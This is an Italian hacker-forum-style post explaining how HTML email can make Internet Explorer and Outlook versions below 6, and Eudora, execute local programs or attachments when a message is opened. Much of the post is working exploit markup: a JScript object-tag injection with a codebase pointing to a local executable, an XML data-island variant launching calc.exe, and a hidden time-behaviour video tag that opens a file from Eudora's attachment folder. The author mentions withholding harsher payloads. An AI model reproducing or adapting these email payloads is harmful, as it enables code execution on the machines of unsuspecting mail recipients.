E' possibile eseguire sia l'allegato che un file presente sul sistema.
Le versioni inferiori alla 6 di IE ( e naturalmente outlook <6) sono vulnerabili a questo e ad altri sistemi...
Per eseguire un file sulla macchina è sufficiente conoscere la locazione specifica dell'eseguibile e scrivere 3 righe di codice nel corpo della mail.
<span id="oSpan"></span>
<script language="jscript" defer>
oSpan.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/filedaeseguireinlocale.exe"></object>';
</script>
Questo è perl' xml
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>
E' anche possibile sfruttare la stessa idea per eseguire un allegato che venga automaticamente copiato in una cartella default ( es per Eudora )
E' anche possibile combinare questo tipo di exploit con altre vulnerabilità ( tipo quella degli wmv che permettono di aprire pagine htm in locale o in rete che possono contenere codice malizioso )
<style>
a { display:none; }
</style>
<body>
Hello, Eudora.
<xml:namespace prefix="t"/>
<t:video style="display:none;behavior:url(#default#time);" t:src="file://C:/Progra~1/Qualcomm/Eudora/Attach/videochevienelanciatoeapreunapaginahtm.wmv"/>
</body>
Non inserisco altri codici poichè quelli più "brutali" ( esecuzione di codice contenuto all'interno del corpo della mail e via dicendo ) potrebbero essere captati da orecchie lameresche
...per questo me ne sto zitto...
Ricorco che le versioni di Outlook e IE superiori o uguali alla 6 non sono vulnerabili da questi attacchi riportati...ma lo sono da altri che non inserisco..
Altre cazzatine si possono fare in java....soprattutto loop...
Insomma..ci si può sbizzarriere..
Ciauzzz